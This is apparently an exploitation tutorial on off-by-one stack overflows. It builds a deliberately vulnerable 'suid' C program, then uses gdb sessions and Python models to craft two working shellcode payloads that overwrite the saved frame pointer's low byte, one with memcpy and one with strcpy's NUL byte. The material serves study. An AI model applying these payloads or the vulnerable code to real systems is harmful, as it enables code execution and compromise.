After this deep dive into heap overflow techniques (although there’s still much to see), it’s time to look again at a particular stack overflow scenario: the so-called “off-by-one”. What happens if the buffer we’re writing into can be overflowed by just one byte? One of the first discussions (if not the very first one) of this kind of scenario appeared on the Bugtraq mailing list: Olaf Kirch posted a message describing this vulnerability, which he called “The poisoned NUL byte”. I will quote the core of his post:
At the beginning of the function, realpath copies the argument (1024 bytes) to a local buffer (sized MAXPATHLEN, i.e. 1024 bytes). Thus, the terminating 0 byte of the string gets scribbled over the next byte, which happens to be the lowest byte of %ebp, the frame pointer of the calling function. At function entry, its value was 0xbffff3ec. After the strcpy, it becomes 0xbffff300. During the remainder of realpath(), nothing exciting happens, but when the function returns, %ebp is restored from stack, which effectively shifts down the calling function’s stack frame by 0xec bytes.
The whole vulnerability consisted of copying a string of X bytes into a buffer of exactly X bytes (and not X + 1). Whoever wrote the code forgot that strcpy always appends a NUL byte to the destination buffer to mark where the string ends. If the destination buffer’s size exactly matches the length of the string, the NUL byte is written outside the buffer itself, potentially overwriting important data. In particular, if the buffer sits right below the pushed EBP value, the latter’s least significant byte (LSB) is overwritten with a NUL byte.
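If you want to convince yourself without firing up a debugger, here is a tiny Python simulation of that copy (a model, not an exploit). The stack is represented as a byte array holding a buffer followed by the saved EBP in little-endian order. The helper name `strcpy_sim` and the 8-byte buffer size are my own assumptions for readability; the EBP value is the one quoted in Kirch’s post.

```python
import struct

def strcpy_sim(memory, dest, src):
    """Mimic strcpy: copy src into memory at dest, then append the NUL terminator."""
    data = src + b"\x00"
    memory[dest:dest + len(data)] = data

BUF_SIZE = 8                 # hypothetical small buffer, just for readability
saved_ebp = 0xBFFFF3EC       # value quoted in Kirch's post

# Layout, from low to high addresses: buffer, then the saved EBP (little-endian).
stack = bytearray(BUF_SIZE) + bytearray(struct.pack("<I", saved_ebp))

# A string exactly as long as the buffer: its terminator lands one byte past the end.
strcpy_sim(stack, 0, b"A" * BUF_SIZE)

corrupted_ebp = struct.unpack_from("<I", stack, BUF_SIZE)[0]
print(hex(corrupted_ebp))    # 0xbffff300
```

Because x86 is little-endian, the first byte after the buffer is the lowest byte of the saved EBP, which is why a single stray NUL turns 0xbffff3ec into 0xbffff300.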
Slightly more than a year later, a deeper analysis of the problem appeared in Phrack #55, in the article “The Frame Pointer overwrite” by klog. The vulnerable code he proposed is the following (he ironically called it “suid”):
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void func(char *sm)
{
    char buffer[256];
    memcpy(buffer, sm, 257);
}

int main(int argc, char *argv[])
{
    if (argc < 2) {
        printf("missing args\n");
        exit(-1);
    }
    func(argv[1]);
    return 0;
}
With a simple compilation
gcc -g -m32 -fno-stack-protector -z execstack -o suid suid.c
and a quick look at the disassembled executable, we can easily check the situation:
$ gdb -q suid
Reading symbols from suid...done.
(gdb) disass func
Dump of assembler code for function func:
   0x08048525 <+0>:     push   ebp
   0x08048526 <+1>:     mov    ebp,esp
   0x08048528 <+3>:     sub    esp,0x118
   0x0804852e <+9>:     mov    DWORD PTR [esp+0x8],0x101
   0x08048536 <+17>:    mov    eax,DWORD PTR [ebp+0x8]
   0x08048539 <+20>:    mov    DWORD PTR [esp+0x4],eax
   0x0804853d <+24>:    lea    eax,[ebp-0x108]
   0x08048543 <+30>:    mov    DWORD PTR [esp],eax
   0x08048546 <+33>:    call   0x80483f0 <memcpy@plt>
   0x0804854b <+38>:    leave
   0x0804854c <+39>:    ret
End of assembler dump.
(gdb)
The LEA instruction at 0x0804853D is somewhat suspicious: why does buffer start 0x108 bytes below the pushed EBP if it is only 0x100 bytes long? This additional space would defeat our goal, since the extra byte would no longer reach the saved EBP. The answer is, again, that GCC aligns the stack to 16 bytes by default; this can be fixed by adding the -mpreferred-stack-boundary=2 parameter to GCC’s command line:
gcc -g -m32 -fno-stack-protector -mpreferred-stack-boundary=2 -z execstack -o suid suid.c
$ gdb -q suid
Reading symbols from suid...done.
(gdb) disass main
Dump of assembler code for function main:
   0x0804854d <+0>:     push   ebp
   0x0804854e <+1>:     mov    ebp,esp
   0x08048550 <+3>:     sub    esp,0x4
   0x08048553 <+6>:     cmp    DWORD PTR [ebp+0x8],0x1
   0x08048557 <+10>:    jg     0x8048571 <main+36>
   0x08048559 <+12>:    mov    DWORD PTR [esp],0x8048620
   0x08048560 <+19>:    call   0x8048400 <puts@plt>
   0x08048565 <+24>:    mov    DWORD PTR [esp],0xffffffff
   0x0804856c <+31>:    call   0x8048410 <exit@plt>
   0x08048571 <+36>:    mov    eax,DWORD PTR [ebp+0xc]
   0x08048574 <+39>:    add    eax,0x4
   0x08048577 <+42>:    mov    eax,DWORD PTR [eax]
   0x08048579 <+44>:    mov    DWORD PTR [esp],eax
   0x0804857c <+47>:    call   0x8048525
   0x08048581 <+52>:    mov    eax,0x0
   0x08048586 <+57>:    leave
   0x08048587 <+58>:    ret
End of assembler dump.
(gdb) disass func
Dump of assembler code for function func:
   0x08048525 <+0>:     push   ebp
   0x08048526 <+1>:     mov    ebp,esp
   0x08048528 <+3>:     sub    esp,0x118
   0x0804852e <+9>:     mov    DWORD PTR [esp+0x8],0x101
   0x08048536 <+17>:    mov    eax,DWORD PTR [ebp+0x8]
   0x08048539 <+20>:    mov    DWORD PTR [esp+0x4],eax
   0x0804853d <+24>:    lea    eax,[ebp-0x100]
   0x08048543 <+30>:    mov    DWORD PTR [esp],eax
   0x08048546 <+33>:    call   0x80483f0 <memcpy@plt>
   0x0804854b <+38>:    leave
   0x0804854c <+39>:    ret
End of assembler dump.
(gdb)
Definitely better. The LEA instruction now places buffer exactly 0x100 bytes below the pushed EBP, so the stack is going to adopt the following layout:
STACK:
 ^
 |
 | pushed EIP
 | pushed EBP
 | buffer[255]
 | buffer[254]
 | ...
 | buffer[0]
 |
So, as expected, the extra byte will overwrite the LSB of the pushed EBP value. What are the consequences of this? How can an EBP changed from 0x11223344 to 0x112233XX be exploited? To understand this, a little bit of study is required. Right before func returns, the LEAVE at 0x0804854B restores the pushed (and altered) value of EBP into the register, and then the function returns; the real deal comes when main returns as well, as the LEAVE instruction at 0x08048586 copies EBP to ESP and pops EBP from the stack. Once this instruction has executed, ESP is set to 0x112233XX + 4 (because of the pop).
This whole thing is easily verifiable:
$ gdb -q suid
Reading symbols from suid...done.
(gdb) b *0x08048587
Breakpoint 1 at 0x8048587
(gdb) b *0x0804854C
Breakpoint 2 at 0x804854c
(gdb) r `python -c 'import sys; sys.stdout.write("A" * 257)'`

Breakpoint 2, 0x0804854c in func ()
(gdb) i r ebp
ebp            0xffffcd41       0xffffcd41
(gdb) c
Continuing.

Breakpoint 1, 0x08048587 in main ()
(gdb) i r esp
esp            0xffffcd45       0xffffcd45
ESP got “damaged” and, right before returning from main, it is set to 0xFFFFCD45. Even though we’re not able to overwrite the return address itself, we can set ESP to a partially arbitrary value, and thus fool the CPU into believing that the return address is stored somewhere else: inside our buffer variable.
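The same chain of events can be replayed with a rough Python model of the two epilogues. This is only a sketch: memory is a dictionary of 32-bit words, the helpers `leave` and `ret` are my own names, and the address chosen for func’s frame (`FUNC_EBP`) is a hypothetical value; only the corrupted EBP, the return address into main and the resulting ESP come from the sessions above.

```python
def leave(regs, mem):
    """LEAVE is equivalent to: mov esp, ebp ; pop ebp"""
    regs["esp"] = regs["ebp"]
    regs["ebp"] = mem.get(regs["esp"], 0)
    regs["esp"] += 4

def ret(regs, mem):
    """RET pops the return address from the top of the stack into EIP."""
    regs["eip"] = mem.get(regs["esp"], 0)
    regs["esp"] += 4

FUNC_EBP = 0xFFFFCD30                 # hypothetical location of func's saved EBP
mem = {
    FUNC_EBP: 0xFFFFCD41,             # saved EBP, LSB overwritten by 'A' (0x41)
    FUNC_EBP + 4: 0x08048581,         # untouched return address (main+52)
}
regs = {"esp": 0, "ebp": FUNC_EBP, "eip": 0}

# func's epilogue: the corrupted value ends up in EBP, but we return to main normally.
leave(regs, mem)
ret(regs, mem)
ebp_after_func = regs["ebp"]

# main's epilogue: LEAVE copies the corrupted EBP into ESP and pops one word.
leave(regs, mem)
esp_before_ret = regs["esp"]

print(hex(ebp_after_func), hex(esp_before_ret))   # 0xffffcd41 0xffffcd45
```

Whatever word sits at `esp_before_ret` is what main’s RET will jump to, which is exactly the lever we are going to pull.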
The next step is to make it point to the right position in buffer and to fill the latter with valid shellcode. This is what buffer’s layout will look like:
NOPs
Shellcode
New return address
Overflowing byte
For the first two elements there’s not much to say: just a bunch of NOP instructions and the usual shellcode will do. The new return address will, of course, be buffer’s address (in my case 0xFFFFCD1C); as for the overflowing byte, it must be computed so that the CPU thinks the return address is the one we placed inside buffer. On my computer, right after the memcpy, buffer looks like this:
(gdb) x/65x 0xFFFFCD1C
0xffffcd1c:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffcd2c:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffcd3c:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffcd4c:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffcd5c:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffcd6c:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffcd7c:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffcd8c:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffcd9c:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffcdac:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffcdbc:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffcdcc:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffcddc:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffcdec:     0x90909090      0x90909090      0xc03117eb      0xc931db31
0xffffcdfc:     0x04b0d231      0xb25901b3      0xb080cd06      0xcddb3101
0xffffce0c:     0xffe4e880      0x7750ffff      0x2164656e      0xffffcd1c
0xffffce1c:     0xffffceXX

EBP -> 0xFFFFCE1C
To trick the CPU properly, the saved EBP stored at 0xFFFFCE1C must become 0xFFFFCE14: main’s LEAVE will then leave ESP at 0xFFFFCE18, which is exactly where our new return address sits. This means that 0x14 is the overflowing byte.
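The arithmetic behind that 0x14 is short enough to write down. The sketch below uses the addresses from my session (they will differ on your machine) and assumes, as in the layout above, that the new return address occupies the last four bytes of buffer; the variable names are mine.

```python
BUF_ADDR = 0xFFFFCD1C            # address of buffer in the session above
BUF_SIZE = 256
ORIGINAL_EBP_HIGH = 0xFFFFCE     # upper three bytes of the saved EBP (0xffffceXX)

ret_slot = BUF_ADDR + BUF_SIZE - 4      # where the new return address is stored
saved_ebp_slot = BUF_ADDR + BUF_SIZE    # first byte past the buffer

# main's LEAVE sets ESP = EBP + 4, so EBP must point 4 bytes below the slot.
needed_ebp = ret_slot - 4
overflow_byte = needed_ebp & 0xFF

# Only the lowest byte can be changed, so the rest must already match.
assert needed_ebp >> 8 == ORIGINAL_EBP_HIGH

print(hex(ret_slot), hex(needed_ebp), hex(overflow_byte))
# 0xffffce18 0xffffce14 0x14
```

The assertion is the important caveat: if the slot we need does not share its upper three bytes with the original saved EBP, a one-byte overwrite cannot reach it.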
Well, everything’s ready. Let’s try this one out:
$ ./suid `python -c 'import sys; sys.stdout.write("\x90" * (252-36) + "\xeb\x17\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x04\xb3\x01\x59\xb2\x06\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8\xe4\xff\xff\xff\x50\x77\x6e\x65\x64\x21" + "\x1c\xcd\xff\xff" + "\x14")'`
Pwned!$
Yah-wee!!!! It works!
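For the record, the one-liner above can also be written as a small script, which makes the layout easier to tweak. This is just a sketch of the same payload: the function name `build_payload` is mine, the shellcode bytes are copied from the command line above, and the address and overflowing byte are the ones from my machine.

```python
import struct

# Shellcode bytes copied from the command line above (36 bytes, ends with "Pwned!").
SHELLCODE = (
    b"\xeb\x17\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x04\xb3\x01\x59\xb2"
    b"\x06\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8\xe4\xff\xff\xff"
    b"\x50\x77\x6e\x65\x64\x21"
)

def build_payload(buf_addr, overflow_byte, buf_size=256):
    """NOPs + shellcode + new return address fill the buffer; one extra byte overflows."""
    ret_addr = struct.pack("<I", buf_addr)            # little-endian, as on x86
    nops = b"\x90" * (buf_size - len(SHELLCODE) - len(ret_addr))
    return nops + SHELLCODE + ret_addr + bytes([overflow_byte])

payload = build_payload(0xFFFFCD1C, 0x14)
print(len(payload))   # 257
```

One practical note if you run this under Python 3: write the result with `sys.stdout.buffer.write(payload)`, because `sys.stdout.write` on a text string would encode bytes such as 0x90 as multi-byte UTF-8 sequences and silently change the payload.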
But it’s not over yet. What if we’re not able to control the overflowing byte? What if, instead of memcpy, we had a wrongly-used strcpy (which is more similar to Kirch’s scenario)?
So, the code changes in the following way:
void func(char *sm)
{
    char buffer[256];

    if (strlen(sm) <= 256)
        strcpy(buffer, sm);
}
When sm is exactly 256 characters long, the check passes and strcpy copies it into buffer, but appends the NUL terminator right outside the boundaries. So, our overflowing byte will be 0x00, without any chance of modifying it. Not a big deal: we just need to rearrange the content of buffer.
We know that the stored EBP value will be corrupted to 0xFFFFCE00 (because of the NUL character): after main’s LEAVE, ESP will be 4 bytes above that value, so the new return address must be stored at 0xFFFFCE04. buffer will look like this:
NOPs
Shellcode
NOPs
New return address
NOPs
(gdb) x/65x 0xFFFFCD1C
0xffffcd1c:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffcd2c:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffcd3c:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffcd4c:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffcd5c:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffcd6c:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffcd7c:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffcd8c:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffcd9c:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffcdac:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffcdbc:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffcdcc:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffcddc:     0x90909090      0xc03117eb      0xc931db31      0x04b0d231
0xffffcdec:     0xb25901b3      0xb080cd06      0xcddb3101      0xffe4e880
0xffffcdfc:     0x7750ffff      0x2164656e      0xffffcd1c      0x90909090
0xffffce0c:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffce1c:     0xffffce00
(NOPs… NOPs everywhere)
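The offsets in this second layout follow directly from the addresses, and it’s worth spelling the computation out. As before, this is a sketch based on my session: the variable names are mine, and the low byte of `SAVED_EBP` is a made-up placeholder, since only its upper three bytes (0xffffce) matter here.

```python
import struct

BUF_ADDR = 0xFFFFCD1C        # address of buffer in the session above
BUF_SIZE = 256
SHELLCODE_LEN = 36
SAVED_EBP = 0xFFFFCE28       # hypothetical low byte; only 0xffffce.. is known

corrupted_ebp = SAVED_EBP & 0xFFFFFF00        # strcpy's NUL clears the lowest byte
ret_slot = corrupted_ebp + 4                  # ESP after main's LEAVE
ret_offset = ret_slot - BUF_ADDR              # position of the address inside buffer

# The slot has to fall inside the buffer, otherwise we cannot write to it.
assert 0 <= ret_offset <= BUF_SIZE - 4

leading_nops = ret_offset - SHELLCODE_LEN
trailing_nops = BUF_SIZE - ret_offset - 4

# strcpy stops at the first NUL, so the address itself must not contain one.
assert b"\x00" not in struct.pack("<I", BUF_ADDR)

print(hex(ret_slot), ret_offset, leading_nops, trailing_nops)
# 0xffffce04 232 196 20
```

The total is 196 + 36 + 4 + 20 = 256 bytes, which is the longest string the `strlen(sm) <= 256` check lets through and exactly the length that pushes the terminator onto the saved EBP.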
Running this one will work:
$ ./suid `python -c 'import sys; sys.stdout.write("\x90" * (232-36) + "\xeb\x17\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x04\xb3\x01\x59\xb2\x06\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8\xe4\xff\xff\xff\x50\x77\x6e\x65\x64\x21" + "\x1c\xcd\xff\xff" + "\x90" * 20)'`
Pwned!$
Throughout the testing I had, once again, to disable ASLR. In conclusion, even a one-byte overflow is enough to change the original behaviour of an application and to bend it to our will. There’s never peace for these guys…